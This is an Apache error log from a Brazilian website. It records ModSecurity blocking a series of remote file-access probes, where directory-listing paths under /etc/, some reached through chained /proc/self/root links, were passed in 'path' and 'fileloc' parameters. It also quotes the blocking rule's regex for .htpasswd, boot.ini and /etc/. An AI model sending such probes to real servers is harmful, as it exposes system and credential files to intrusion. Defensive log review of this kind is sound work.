[Fri Mar 20 11:02:26.246195 2026] [:error] [pid 15826:tid 140411582465792] [client 216.73.216.191:44802] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1TcuoXxyEfFpUF8f-m_wAAAVM"]
[Fri Mar 20 11:02:28.387833 2026] [:error] [pid 7235:tid 140411741927168] [client 216.73.216.191:44870] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1Tc_qxLDW4GITHUkQQqwAAAQA"]
[Fri Mar 20 11:02:35.845257 2026] [:error] [pid 31215:tid 140411699963648] [client 216.73.216.191:45156] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1TewF0L0L-SsrnPo6QdgAAAsU"]
[Fri Mar 20 11:02:35.866956 2026] [:error] [pid 21219:tid 140411666392832] [client 216.73.216.191:45278] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1TevXLqtnMIWvjpaLCsgAAAok"]
[Fri Mar 20 11:02:36.853777 2026] [mime_magic:error] [pid 31215:tid 140411733534464] (70014)End of file found: [client 57.141.18.35:45380] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:02:38.687669 2026] [access_compat:error] [pid 11167:tid 140411725141760] [client 195.123.216.134:50502] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 11:02:38.991565 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.241.31:58282] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1TfuoXxyEfFpUF8f-nIgAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:02:41.503444 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.243.128:53416] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1TgfqxLDW4GITHUkQQuwAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:02:41.546272 2026] [:error] [pid 26799:tid 140411699963648] [client 216.73.216.191:45672] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1Tgda6ubjKNq_cu4YBcQAAA0U"]
[Fri Mar 20 11:02:43.643088 2026] [:error] [pid 21219:tid 140411666392832] [client 216.73.216.191:45798] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/universal"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Tg_XLqtnMIWvjpaLCwAAAAok"]
[Fri Mar 20 11:02:48.695233 2026] [:error] [pid 10189:tid 140411666392832] [client 57.141.18.8:46072] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1TiDJ3M9BSuKP7CAZMogAAAIk"]
[Fri Mar 20 11:02:48.760330 2026] [:error] [pid 10189:tid 140411741927168] [client 216.73.216.191:46080] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1TiDJ3M9BSuKP7CAZMowAAAIA"]
[Fri Mar 20 11:02:52.136383 2026] [:error] [pid 11642:tid 140411574073088] [client 216.73.216.191:46230] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1TjLninkcc-iUj5AqEWAAAA5Q"]
[Fri Mar 20 11:02:52.335714 2026] [:error] [pid 15826:tid 140411641214720] [client 216.73.216.191:46248] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1TjOoXxyEfFpUF8f-nLwAAAUw"]
[Fri Mar 20 11:02:59.499095 2026] [:error] [pid 11642:tid 140411641214720] [client 216.73.216.191:46646] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1Tk7ninkcc-iUj5AqEXQAAA4w"]
[Fri Mar 20 11:03:10.642280 2026] [mime_magic:error] [pid 9818:tid 140411674785536] (70014)End of file found: [client 216.73.216.191:47256] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:03:18.931221 2026] [:error] [pid 9818:tid 140411548894976] [client 57.141.18.7:47698] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Tpl1pVZ5mVmJwsFNWcAAAAFc"]
[Fri Mar 20 11:03:37.430966 2026] [:error] [pid 7893:tid 140411666392832] [client 57.141.18.27:48198] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/iproute2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1TuRCii7xarUs8iHaRkgAAAgk"]
[Fri Mar 20 11:03:38.732757 2026] [:error] [pid 15826:tid 140411741927168] [client 57.141.18.71:48246] [client 57.141.18.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1TuuoXxyEfFpUF8f-nVAAAAUA"]
[Fri Mar 20 11:03:41.835411 2026] [:error] [pid 10189:tid 140411658000128] [client 57.141.18.96:48270] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1TvTJ3M9BSuKP7CAZM9QAAAIo"]
[Fri Mar 20 11:04:00.493760 2026] [mime_magic:error] [pid 10189:tid 140411590858496] (70014)End of file found: [client 57.141.18.49:49176] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:04:03.924675 2026] [:error] [pid 7235:tid 140411658000128] [client 57.141.18.19:49392] [client 57.141.18.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1T0_qxLDW4GITHUkQQ_QAAAQo"]
[Fri Mar 20 11:04:06.000811 2026] [:error] [pid 11642:tid 140411649607424] [client 57.141.18.64:49542] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1T1bninkcc-iUj5AqEowAAA4s"]
[Fri Mar 20 11:04:07.615480 2026] [:error] [pid 7235:tid 140411548894976] [client 216.73.216.191:49658] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/krb5.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1T1_qxLDW4GITHUkQRAAAAARc"]
[Fri Mar 20 11:04:08.035577 2026] [:error] [pid 10189:tid 140411574073088] [client 74.7.243.128:39936] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1T2DJ3M9BSuKP7CAZNGgAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:04:10.078794 2026] [:error] [pid 31215:tid 140411632822016] [client 216.73.216.191:49826] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1T2gF0L0L-SsrnPo6QsQAAAs0"]
[Fri Mar 20 11:04:15.339448 2026] [:error] [pid 21219:tid 140411574073088] [client 57.141.18.34:50024] [client 57.141.18.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1T3vXLqtnMIWvjpaLDEQAAApQ"]
[Fri Mar 20 11:04:15.813789 2026] [mime_magic:error] [pid 7893:tid 140411582465792] (70014)End of file found: [client 57.141.18.9:50114] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:04:23.361473 2026] [:error] [pid 21219:tid 140411565680384] [client 216.73.216.191:50562] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/uct"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1T5_XLqtnMIWvjpaLDFwAAApU"]
[Fri Mar 20 11:04:29.040917 2026] [access_compat:error] [pid 9818:tid 140411624429312] [client 51.210.110.147:38083] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 11:04:30.927663 2026] [:error] [pid 15826:tid 140411716749056] [client 216.73.216.191:51068] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1T7uoXxyEfFpUF8f-nhQAAAUM"]
[Fri Mar 20 11:04:31.983691 2026] [:error] [pid 7893:tid 140411624429312] [client 216.73.216.191:51146] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1T7xCii7xarUs8iHaRwwAAAg4"]
[Fri Mar 20 11:04:35.395032 2026] [:error] [pid 11642:tid 140411624429312] [client 74.7.243.128:36486] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1T87ninkcc-iUj5AqE1gAAA44"], referer: 